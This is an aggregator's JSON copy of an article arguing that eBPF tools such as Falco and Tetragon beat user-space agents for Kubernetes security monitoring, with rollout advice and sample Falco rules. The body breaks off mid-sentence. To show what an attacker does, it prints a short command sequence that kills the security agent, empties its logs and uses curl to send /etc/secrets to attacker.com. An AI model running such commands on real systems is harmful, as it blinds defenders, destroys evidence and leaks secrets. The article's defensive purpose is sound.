{"slug": "article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "title": "Article: Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability", "summary": "User-space security agents are structurally flawed because they share the same privilege level as the processes they monitor, allowing attackers with root access to simply kill the agent or erase logs. It explains that eBPF solves this by attaching probes directly to the Linux kernel's syscall interface, providing visibility that a container-level attacker cannot disable. The piece also notes that replacing multiple user-space agents with a single eBPF-based solution can reduce security-related CPU consumption by 60-80% and that production-ready tools like Falco and Tetragon are available today.", "body_md": "Key Takeaways\n- Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed.\n- eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires escaping to the host kernel, which is a far harder problem than running `kill -9`.\n- Replacing a stack of user-space security agents with a single eBPF-based agent can cut security-related CPU consumption by 60-80%, and the telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per-GB for.\n- Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service.\n- Falco (CNCF graduated) and Tetragon (Cilium sub-project) are production-ready today. 
You do not need to write kernel code to get started.\nIntroduction\nLast year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible.\nThe attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant `kill -9` on the agent, `truncate` on the log files, and then free rein. Fileless payloads via `memfd_create()` never touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup.\nThat write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it.\nThis article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now.\nThe Problem with User-Space Security Agents\nLiving at the Same Privilege Level as the Threat\nMost Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch.\nFigure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. (Original diagram by the author)\nThis architecture has a fundamental issue: the security agent and the attacker operate at the same level. 
With root in the container, an attacker can:\n$ kill -9 $(pgrep security-agent)\n$ truncate -s 0 /var/log/agent/*.log\n$ curl http://attacker.com/exfil -d @/etc/secrets\nNo alert ever fires because the agent was dead before anything interesting happened.\nThe CPU Tax\nUser-space agents also impose real cost. To inspect network traffic they proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting.\nWhat Attackers Know\nCapable adversaries specifically target these gaps. `memfd_create()` lets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores. Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy.\nHow eBPF Changes the Equation\nThe Short Version\neBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism (hence \"Berkeley Packet Filter\"), the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security:\n- A built-in verifier statically analyzes every eBPF program at load time, proving it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. Zero runtime cost, zero risk of a kernel panic.\n- eBPF programs execute in kernel context with direct access to kernel data structures. 
No user-kernel context switches, no proxy overhead.\n- You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints.\nThe Verifier Deserves Its Own Paragraph\nRunning custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified. A buggy module can panic the machine. eBPF's verifier removes that failure mode entirely. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth (capped at 512 bytes). All statically, all before the program loads.\nThe verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale.\nWhere the Probes Sit\nFor security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations.\nFigure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. (Original diagram by the author)\nWhen any process calls `connect()`, `execve()`, or `open()`, the probe captures the syscall arguments, process/thread IDs, container ID, Kubernetes pod metadata, user ID, capabilities, and the parent process chain. Because the probe runs in kernel context, an attacker with root inside a container would need to escape to the host kernel to tamper with it. 
That is a completely different class of problem compared to killing a user-space process.\nThe Cost Story\nOrganizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads.\nFigure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. (Original diagram by the author)\nThere is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial.\nKernel Compatibility\nThe features that matter for production security landed across kernels 4.15 through 5.7:\nMost production Kubernetes distributions ship with 5.4+, so kernel support is rarely a blocker. Worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution.\nRolling It Out Without Breaking Production\nDo not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem.\nFigure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. (Original diagram by the author)\nPhase 1: Watch and Learn\nDeploy an eBPF agent (Falco or Tetragon) as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts:\nspec:\nhostPID: true\nhostNetwork: true\ncontainers:\n- name: agent\nimage: falcosecurity/falco-no-driver:latest\nsecurityContext:\nprivileged: true\nvolumeMounts:\n- name: bpf-fs\nmountPath: /sys/fs/bpf\n- name: kernel-debug\nmountPath: /sys/kernel/debug\nreadOnly: true\nFalco's Helm chart handles the full DaemonSet config. 
For a first deployment, start there.\nDuring this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles.\nPhase 2: Alert on Anomalies\nNow write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal.\nA Falco rule for unexpected process execution in a payment service:\n- rule: Unexpected Process in Payment Service\ndesc: Detect execution of binaries not in the approved list\ncondition: >\nspawned_process and\ncontainer.name startswith \"payment-\" and\nnot proc.name in (java, jcmd, jstat)\noutput: >\nUnexpected process executed in payment container\n(user=%user.name container=%container.name\nprocess=%proc.name cmdline=%proc.cmdline\nparent=%proc.pname)\npriority: WARNING\ntags: [container, process, payment]\nAnd one for metadata service access, which is almost always a sign of trouble:\n- rule: Container Accessing Cloud Metadata Service\ndesc: Detect attempts to access instance metadata\ncondition: >\noutbound and\nfd.sip = \"169.254.169.254\" and\ncontainer.id != host\noutput: >\nContainer attempted metadata service access\n(container=%container.name pod=%k8s.pod.name\nnamespace=%k8s.ns.name dest=%fd.sip)\npriority: CRITICAL\ntags: [network, cloud, metadata]\nSpend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios.\nPhase 3: Enforce\nWith high confidence in your detection rules, enable active blocking. Tetragon can use `bpf_send_signal()` to SIGKILL a process before the offending syscall completes. 
Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow.\nA typical enforcement scenario: a container calls `connect()` to 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached.\nThis phase demands discipline. A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability.\nTooling: Falco, Tetragon, and the Vendors\nFalco is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more.\nWhat I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between \"process X called `connect()` to 169.254.169.254\" and \"the `payment-api` pod in `prod` namespace tried to reach the cloud metadata service\" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert.\nFor active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon. It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack. 
Commercial vendors like Sysdig, ", "url": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "canonical_source": "https://www.infoq.com/articles/ebpf-for-security-observability/?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global", "published_at": "2026-05-19 09:00:00+00:00", "updated_at": "2026-05-19 21:47:47.045211+00:00", "lang": "en", "topics": ["cybersecurity", "open-source", "cloud-computing", "developer-tools", "enterprise-software"], "entities": ["eBPF", "Falco", "Tetragon", "Cilium", "CNCF", "Linux", "Kubernetes"], "alternates": {"html": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "markdown": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.md", "text": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.txt", "jsonld": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.jsonld"}}